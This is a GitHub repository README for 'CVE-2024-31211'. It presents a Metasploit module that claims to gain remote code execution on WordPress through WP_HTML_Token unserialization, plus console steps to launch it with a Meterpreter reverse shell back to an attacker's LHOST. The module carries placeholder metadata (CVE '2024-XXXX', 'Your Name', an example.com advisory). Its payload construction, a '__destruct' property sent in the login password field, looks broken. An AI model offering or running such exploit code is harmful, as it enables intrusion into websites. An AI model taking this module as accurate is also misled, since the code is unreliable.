Skip to content

Abdurahmon3236/-CVE-2024-31211

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

To create a Metasploit module that exploits the RCE vulnerability in WordPress via the unserialization of instances of the WP_HTML_Token class, we'll focus on crafting a payload that triggers the unserialization flaw, leading to arbitrary code execution.

Metasploit Module

Save the following code as wordpress_wp_html_token_rce.rb in the modules/exploits/multi/http directory of your Metasploit Framework installation.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP_HTML_Token Unserialization RCE',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in WordPress via
        the unserialization of instances of the `WP_HTML_Token` class. This allows for
        code execution via its `__destruct()` magic method.
      },
      'Author'         =>
        [
          'Your Name'  # OneArch
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2024-XXXX'],  # Replace with the correct CVE number
          ['URL', 'https://example.com/advisory']  # Replace with an advisory link if available
        ],
      'DisclosureDate' => 'Aug 03 2024',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [
        ['WordPress <= 5.x', { }]
      ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'Payload'        =>
        {
          'BadChars' => "\x00",
        }
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The base path to the WordPress installation", '/']),
      ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'wp-login.php'),
    })

    if res && res.code == 200 && res.body.include?('wp-login.php')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Sending payload to trigger unserialization vulnerability")

    serialized_payload = 'O:13:"WP_HTML_Token":1:{s:13:"__destruct";s:' + payload.encoded.length.to_s + ':"' + payload.encoded + '";}'

    post_data = {
      'user_login' => Rex::Text.rand_text_alphanumeric(8..12),
      'user_pass'  => serialized_payload,
      'wp-submit'  => 'Log In',
      'redirect_to' => normalize_uri(target_uri.path, 'wp-admin/'),
      'testcookie' => 1
    }

    send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri.path, 'wp-login.php'),
      'vars_post' => post_data
    })

    handler
  end
end

Usage Instructions

  1. Save the Module: Save the module as wordpress_wp_html_token_rce.rb in the modules/exploits/multi/http directory of your Metasploit Framework installation.

    /path/to/metasploit-framework/modules/exploits/multi/http/wordpress_wp_html_token_rce.rb
  2. Load Metasploit: Start Metasploit Framework by opening a terminal and running:

    msfconsole
  3. Use the New Module: In the Metasploit console, load the new exploit module using the following command:

    use exploit/multi/http/wordpress_wp_html_token_rce
  4. Configure and Run: Set the necessary options, such as RHOSTS, RPORT, TARGETURI, and PAYLOAD. Then run the module.

    msf6 > use exploit/multi/http/wordpress_wp_html_token_rce
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set RHOSTS target_ip
    RHOSTS => target_ip
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set TARGETURI /
    TARGETURI => /
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set PAYLOAD php/meterpreter/reverse_tcp
    PAYLOAD => php/meterpreter/reverse_tcp
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LHOST your_ip
    LHOST => your_ip
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LPORT 4444
    LPORT => 4444
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > run

Important Considerations

  • Ensure you have the appropriate permissions before testing or exploiting any systems.
  • This module is designed for educational and testing purposes. Always test in a safe and controlled environment before using it on any production systems.

This Metasploit module sends a crafted serialized payload to a vulnerable WordPress instance, attempting to trigger the unserialization vulnerability and achieve arbitrary code execution. Adjust the payload and module as necessary based on the specific nature of the vulnerability and the target environment.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages